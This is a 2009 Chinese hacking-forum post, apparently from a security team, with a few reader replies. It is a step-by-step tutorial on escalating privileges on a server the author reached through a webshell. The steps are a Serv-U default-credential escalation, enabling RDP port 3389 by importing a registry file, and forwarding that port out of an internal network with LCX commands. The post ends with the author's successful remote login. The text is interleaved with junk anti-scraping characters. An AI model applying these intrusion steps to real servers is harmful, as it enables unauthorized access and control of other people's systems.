|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
原创作者:huar
, x2 r3 N* f& @! ]* N4 s原创出处:3.A.S.T 网络安全技术团队: [7 D1 W% R# I2 ^: g. }: a
7 `4 h/ `8 I; [, G& e3 s简单的提权教程,希望给还不会提权的兄弟们简单介绍下。& Q$ D% h+ y, G4 c! ~
之前的一个shell,在翻看记事本的时候找到的,大致看了下,shell权限还是非常大的,于是就试试提下权。
l, `5 U/ D+ k: E- u% D( i8 w- s$ m4 E! g4 o9 p2 ^8 O
提权方法:SERU-U+LCX端口转发+注册表开3389端口) c, ^1 f% K- K* @! p
% t6 F" z$ h: h2 e3 P6 b; }
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先上传个cmd试下可以运行,在查看服务器开的端口时,发现服务器开了4899、43958等端口,是没有开3389端口的(截图提权之前未截取,抱歉``)。 于是我就试下常用的Serv-U提权了,如果管理员大叔照顾我们这些小菜的话,那就太好了..
, k! R+ d$ o* T# Z# ?3 x. O" T" {" p$ f, r) z
* b* Z, [2 ~9 f/ R; r1 H; D% `+ b+ K$ l% s% k
先用默认账号密码试试,不过很幸运的是用默认账号密码提权成功了,嘿嘿``没想到管理员大叔这么照顾俺们这些小菜..接下来的路就好走多了~~& f. x; @; k9 W8 B3 h/ Q; {
/ a! _5 w6 D7 a5 t7 F1 f, a
前面说了,服务器是没有开3389端口的,工欲善其事必先利其器,由于现在我手中没有免杀的开3389端口的工具,所以我们就想想其它的办法吧``最后想了下,我们可以用导入注册表的方法开启服务器的3389服务端口,最后上传个开3389的注册表文件,在Serv-U命令下成功导入,3389端口成功开启.0 K1 H3 }, T9 M" v6 d2 q z
! C2 y; a9 o) T! g, u( x) [5 O4 n, G2 P3 Y
还有就是服务器是在内网了,那我们就要用LCX做端口转发。
/ }5 J* @! g; x+ V g: {' n服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) 3389. G$ N# W6 ^ ?9 N' v/ \# Y" D
本地机器运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
2 W/ v4 p+ s6 i+ Y$ a$ ^7 r! Z F1 X7 ?7 J$ T, y" [
具体的可以参考下呆呆版主做的视频教程,做的非常详细,在这里就不再多说什么了。 S9 X+ v$ j3 ^, e j4 P
3 M5 ?+ {) e: A# R0 u
/ c b, Q, y$ H最后就是我的机器也在内网,LCX 转发端口到本地必须用公网ip,这个好办,路由器里有DMZ,可以用下这个功能的``嘿嘿~~1 Q" k1 N' _! J
' _7 x9 r/ M, w: v: d+ v% A$ g6 w! o: J
5 u5 D: \. {2 C7 {, b& t最后远程连接成功```
1 A! y9 X( t/ k" u o* S& j
1 L9 [# W4 G, V) u0 d# m9 b# l. F' s7 A {0 p/ r5 S7 E% ~
) W8 m) J2 x& n' O0 H' B/ ^
前几天还在议论INTEL和AMD的服务器处理器的问题呢``这次就遇见个AMD的服务器,嘿嘿`````2 H- f3 H( j, @8 j1 d% [
感觉速度还可以```` |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-6-27 18:59
| 
受益了
发表于 2009-6-29 09:32
| .gif)
发表于 2009-6-28 13:03
| 